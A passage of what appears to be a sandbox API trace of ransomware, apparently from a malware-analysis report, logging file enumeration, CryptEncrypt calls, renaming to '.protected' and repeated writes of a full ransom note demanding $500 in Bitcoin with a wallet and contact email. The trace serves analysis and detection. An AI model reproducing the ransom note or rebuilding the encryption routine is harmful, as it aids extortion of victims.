lpOverlapped=0x0) returned 1 [0094.787] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.787] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0094.787] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0094.787] CloseHandle (hObject=0x14c) returned 1 [0094.787] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Settings.ini.protected") returned 83 [0094.787] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Settings.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows sidebar\\settings.ini"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Settings.ini.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows sidebar\\settings.ini.protected")) returned 1 [0094.788] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0094.788] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0094.788] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\RESTORE_FILES.txt") returned 78 [0094.788] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows sidebar\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0094.797] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0094.797] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0094.798] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0094.798] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0094.798] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0094.798] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0094.798] CloseHandle (hObject=0xd8) returned 1 [0094.798] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0094.798] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0094.799] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\RESTORE_FILES.txt") returned 62 [0094.799] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0094.800] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0094.800] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0094.800] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0094.800] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0094.800] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0094.800] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, lpOverlapped=0x0) returned 1 [0094.800] CloseHandle (hObject=0xd4) returned 1 [0094.801] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0094.801] lstrcmpiW (lpString1="Temp", lpString2="Windows") returned -1 [0094.801] lstrcmpiW (lpString1="Temp", lpString2="Program Files") returned 1 [0094.801] lstrcmpiW (lpString1="Temp", lpString2="Program Files (x86)") returned 1 [0094.801] lstrcmpiW (lpString1="Temp", lpString2="$Recycle.bin") returned 1 [0094.801] lstrcmpiW (lpString1="Temp", lpString2="System Volume Information") returned 1 [0094.801] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temp") returned 39 [0094.801] lstrcmpW (lpString1="Temp", lpString2=".") returned 1 [0094.801] lstrcmpW (lpString1="Temp", lpString2="..") returned 1 [0094.801] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temp\\*") returned 41 [0094.801] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temp\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0094.802] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0094.802] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0094.802] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0094.802] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0094.802] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0094.802] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temp\\.") returned 41 [0094.802] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0094.802] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0094.802] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0094.802] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0094.802] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0094.802] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0094.802] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0094.802] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temp\\..") returned 42 [0094.802] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0094.802] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0094.802] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0094.802] lstrcmpiW (lpString1="FXSAPIDebugLogFile.txt", lpString2="Windows") returned -1 [0094.802] lstrcmpiW (lpString1="FXSAPIDebugLogFile.txt", lpString2="Program Files") returned -1 [0094.802] lstrcmpiW (lpString1="FXSAPIDebugLogFile.txt", lpString2="Program Files (x86)") returned -1 [0094.802] lstrcmpiW (lpString1="FXSAPIDebugLogFile.txt", lpString2="$Recycle.bin") returned 1 [0094.802] lstrcmpiW (lpString1="FXSAPIDebugLogFile.txt", lpString2="System Volume Information") returned -1 [0094.802] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temp\\FXSAPIDebugLogFile.txt") returned 62 [0094.802] StrStrIW (lpFirst="FXSAPIDebugLogFile.txt", lpSrch=".protected") returned 0x0 [0094.803] lstrcmpW (lpString1="FXSAPIDebugLogFile.txt", lpString2="RESTORE_FILES.txt") returned -1 [0094.803] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0094.803] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0094.803] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temp\\FXSAPIDebugLogFile.txt" (normalized: "c:\\users\\default\\appdata\\local\\temp\\fxsapidebuglogfile.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0094.803] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temp\\FXSAPIDebugLogFile.txt") returned 62 [0094.803] StrStrW (lpFirst="FXSAPIDebugLogFile.txt", lpSrch=".txt") returned=".txt" [0094.803] lstrlenW (lpString=".txt") returned 4 [0094.803] lstrlenW (lpString=".txt") returned 4 [0094.803] ReadFile (in: hFile=0xd8, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295ec94*=0x0, lpOverlapped=0x0) returned 1 [0094.803] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.803] WriteFile (in: hFile=0xd8, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295ec94*=0x0, lpOverlapped=0x0) returned 1 [0094.804] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.804] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0094.804] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0094.804] CloseHandle (hObject=0xd8) returned 1 [0094.805] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temp\\FXSAPIDebugLogFile.txt.protected") returned 72 [0094.805] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temp\\FXSAPIDebugLogFile.txt" (normalized: "c:\\users\\default\\appdata\\local\\temp\\fxsapidebuglogfile.txt"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temp\\FXSAPIDebugLogFile.txt.protected" (normalized: "c:\\users\\default\\appdata\\local\\temp\\fxsapidebuglogfile.txt.protected")) returned 1 [0094.805] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0094.805] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0094.807] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temp\\RESTORE_FILES.txt") returned 57 [0094.807] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temp\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\appdata\\local\\temp\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0094.807] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0094.807] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0094.808] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0094.808] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0094.808] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0094.808] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, lpOverlapped=0x0) returned 1 [0094.808] CloseHandle (hObject=0xd4) returned 1 [0094.808] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0094.808] lstrcmpiW (lpString1="Temporary Internet Files", lpString2="Windows") returned -1 [0094.808] lstrcmpiW (lpString1="Temporary Internet Files", lpString2="Program Files") returned 1 [0094.808] lstrcmpiW (lpString1="Temporary Internet Files", lpString2="Program Files (x86)") returned 1 [0094.808] lstrcmpiW (lpString1="Temporary Internet Files", lpString2="$Recycle.bin") returned 1 [0094.808] lstrcmpiW (lpString1="Temporary Internet Files", lpString2="System Volume Information") returned 1 [0094.808] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temporary Internet Files") returned 59 [0094.808] lstrcmpW (lpString1="Temporary Internet Files", lpString2=".") returned 1 [0094.808] lstrcmpW (lpString1="Temporary Internet Files", lpString2="..") returned 1 [0094.808] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temporary Internet Files\\*") returned 61 [0094.809] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temporary Internet Files\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0xffffffff [0094.809] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0094.809] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0094.809] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\RESTORE_FILES.txt") returned 52 [0094.809] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\appdata\\local\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0094.809] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0094.809] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0094.810] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0094.810] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0094.810] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0094.810] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0094.810] CloseHandle (hObject=0xb4) returned 1 [0094.811] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0094.811] lstrcmpiW (lpString1="LocalLow", lpString2="Windows") returned -1 [0094.811] lstrcmpiW (lpString1="LocalLow", lpString2="Program Files") returned -1 [0094.811] lstrcmpiW (lpString1="LocalLow", lpString2="Program Files (x86)") returned -1 [0094.811] lstrcmpiW (lpString1="LocalLow", lpString2="$Recycle.bin") returned 1 [0094.811] lstrcmpiW (lpString1="LocalLow", lpString2="System Volume Information") returned -1 [0094.811] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow") returned 37 [0094.811] lstrcmpW (lpString1="LocalLow", lpString2=".") returned 1 [0094.811] lstrcmpW (lpString1="LocalLow", lpString2="..") returned 1 [0094.811] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\*") returned 39 [0094.811] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\*", lpFindFileData=0x295ef20 | out: 